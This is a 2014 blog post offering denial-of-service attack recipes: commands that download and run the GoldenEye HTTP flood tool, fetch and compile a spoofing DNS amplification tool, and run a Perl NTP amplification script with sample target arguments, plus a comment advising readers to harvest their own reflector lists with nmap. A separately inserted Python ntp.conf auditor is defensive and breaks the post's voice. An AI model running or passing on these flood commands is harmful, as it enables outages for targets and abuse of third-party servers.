Friday, 21 February 2014

DDoS / DoS / amplification attacks ++

1st post in 2014... finally! After 8 or so months of looking at the screen I managed to remember how to use my keyboard... and what could be more trendy and appropriate than a tribute to DoS attacks :) so go on! Get yourselves in trouble! (please don't!) DISCLAIMER: All information here is for educational purposes, may the Force be with you!

Russia's dirty secret (Golden eye):

Attack Vector exploited: HTTP Keep Alive + NoCache

wget https://raw.github.com/jseidl/GoldenEye/master/goldeneye.py

python goldeneye.py http://192.168.1.10 -w 10 -s 6 -m random

(that's the light-handed approach...)

DNS Amplification attack:

A well-documented attack that takes advantage of UDP packet spoofing and misconfigured DNS servers.

How to test:
dig ANY isc.org @x.x.x.x
Where to test:
http://openresolverproject.org/

The tool (good old packetstorm):
wget http://packetstorm.foofus.com/DoS/dns_spquery.c.gz
gunzip dns_spquery.c.gz
gcc dns_spquery.c -o dns_spquery

./dns_spquery <target_ip> <dns_to_use> <some_fqdn_to_resolve>

NTP Amplification attack:

A well-documented attack that takes advantage of UDP packet spoofing and misconfigured NTP servers.

How to test:
ntpdc -c monlist <target_ntp_server>
or
nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target_ntp_server>
(script available here http://nmap.org/svn/scripts/ntp-monlist.nse)
Where to test:
http://openntpproject.org/
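
The monlist test above has a server-side counterpart: checking whether your own ntp.conf leaves monlist answerable. The audit below is an added example, not code from the original post or from any of the tools it links. The function name, the sample configs and the assumption that a bare "restrict default" covers both IPv4 and IPv6 are mine.

```python
# Added example: sample configs are constructed, not taken from real hosts.
def audit_ntp_conf(conf_text):
    """Report whether an ntp.conf leaves mode 7 monlist answerable by default."""
    monitor_enabled = True                      # ntpd default: monitoring on
    limited_seen = False
    default_flags = {"-4": set(), "-6": set()}  # no default entry = no limits
    for raw in conf_text.splitlines():
        tok = raw.split("#", 1)[0].split()      # drop comments, tokenize
        if not tok:
            continue
        if tok[0] in ("enable", "disable") and "monitor" in tok[1:]:
            monitor_enabled = tok[0] == "enable"
        elif tok[0] == "restrict":
            args, families = tok[1:], ("-4", "-6")
            if args and args[0] in families:    # explicit address family
                families, args = (args[0],), args[1:]
            if "limited" in args:
                limited_seen = True
            # Assumption: a bare "restrict default" covers IPv4 and IPv6.
            if args and args[0] == "default":
                for fam in families:
                    default_flags[fam] = set(args[1:])
    # ntpd keeps the monitoring list alive while any entry uses "limited",
    # even with "disable monitor", so noquery is what actually blocks monlist.
    monitor_active = monitor_enabled or limited_seen
    open_families = sorted(f for f, flags in default_flags.items()
                           if not flags & {"noquery", "ignore"})
    return {"monitor_active": monitor_active, "open_families": open_families,
            "exposed": monitor_active and bool(open_families)}

STOCK = """driftfile /var/lib/ntp/drift
server 0.pool.ntp.org iburst
restrict 127.0.0.1
"""
HARDENED = """disable monitor
restrict default kod nomodify notrap nopeer noquery
restrict 127.0.0.1
restrict -6 ::1
"""
PARTIAL = """disable monitor   # looks safe, but "limited" re-enables monitoring
restrict -4 default kod limited nomodify notrap nopeer noquery
"""

if __name__ == "__main__":
    for name, conf in (("stock", STOCK), ("hardened", HARDENED), ("partial", PARTIAL)):
        print(name, audit_ntp_conf(conf))
```

The "partial" config is the case worth noticing: IPv4 is locked down, but the IPv6 default has no noquery and the "limited" flag keeps the monitoring list populated.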

The tool:
wget https://gist.githubusercontent.com/anonymous/d3abecdf9e828b3b7c37/raw/efe9154d88c67e2a1775a2f58cf2396ccc1e463d/gistfile1.pl
perl gistfile1.pl <target_IP> <src_port> <duration_in_sec> <list_file_name> <packet_payload_repetition??> <thread_number>

so that would be
perl gistfile1.pl 192.168.1.1 53 60 list.txt 2 10
or something similar...


Stay tuned for more..


2 comments:

  1. On NTP, where can I get the list.txt from?

    1. Hey mitchell, you create your own list.txt via the nmap scanning method. It's always best to collect fresh results rather than using some ready-made list :)
